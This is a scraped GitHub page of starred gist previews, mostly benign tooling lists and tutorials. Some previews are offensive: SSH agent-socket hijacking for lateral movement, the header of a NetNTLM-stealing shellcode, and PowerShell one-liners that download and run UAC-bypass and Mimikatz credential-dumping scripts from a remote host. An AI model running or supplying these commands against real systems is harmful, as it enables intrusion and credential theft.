Skip to content

Instantly share code, notes, and snippets.

View crgr's full-sized avatar

Cristian Grigoriu crgr

11 followers · 5 following
View GitHub Profile
@sts10
sts10 / rust-command-line-utilities.markdown
Last active July 27, 2024 18:00
A curated list of command-line utilities written in Rust

A curated list of command-line utilities written in Rust

Note: I have moved this list to a proper repository. I'll leave this gist up, but it won't be updated. To submit an idea, open a PR on the repo.

Note that I have not tried all of these personally, and cannot and do not vouch for all of the tools listed here. In most cases, the descriptions here are copied directly from their code repos. Some may have been abandoned. Investigate before installing/using.

The ones I use regularly include: bat, dust, fd, fend, hyperfine, miniserve, ripgrep, just, cargo-audit and cargo-wipe.

  • atuin: "Magical shell history"
  • bandwhich: Terminal bandwidth utilization tool
@0xmachos
0xmachos / macOS-IR-Forensics.md
Last active July 21, 2024 23:36
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@muff-in
muff-in / resources.md
Last active July 18, 2024 01:30
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@EgeBalci
EgeBalci / steal_netntlm_x64.asm
Created June 26, 2019 18:09
NetNTLMv2 stealer shellcode. (x64)
;-----------------------------------------------------------------------------;
; Author: Ege Balcı (egebalci[at]pm[dot]me)
; Compatible: All Windows versions with SMBv2/v1
; Architecture: x64
; Size: 265 + strlen(IP) + 1
; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode
;-----------------------------------------------------------------------------;
[BITS 64]
[ORG 0]
@luk6xff
luk6xff / ARMonQEMUforDebianUbuntu.md
Last active June 6, 2024 17:16 — forked from bruce30262/ARMDebianUbuntu.md
Emulating ARM with QEMU on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under linux (without starting QEMU VM!)

First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux

If there's no qemu-arm-static in the package list, install qemu-user-static instead

@worldofprasanna
worldofprasanna / terminal-capture.md
Last active July 15, 2024 17:45
Multiple screen terminal capture using asciinema & tmux

Commands Reference

  1. Start a new tmux named session tmux new -s terminal-capture
  2. Split the screen using these commands,
  • vertical split <C-b>"
  • horizontal split <C-b>%
  1. To navigate between the panes,
  • To goto Left pane <C-b> left-key
  • To goto Right pane <C-b> right-key
  • To goto Top pane up-key
@shaneutt
shaneutt / LICENSE
Last active July 18, 2024 10:14
Golang: Demonstrate creating a CA Certificate, and Creating and Signing Certs with the CA
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@milo2012
milo2012 / getMoreDomains.py
Last active July 10, 2019 14:01
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time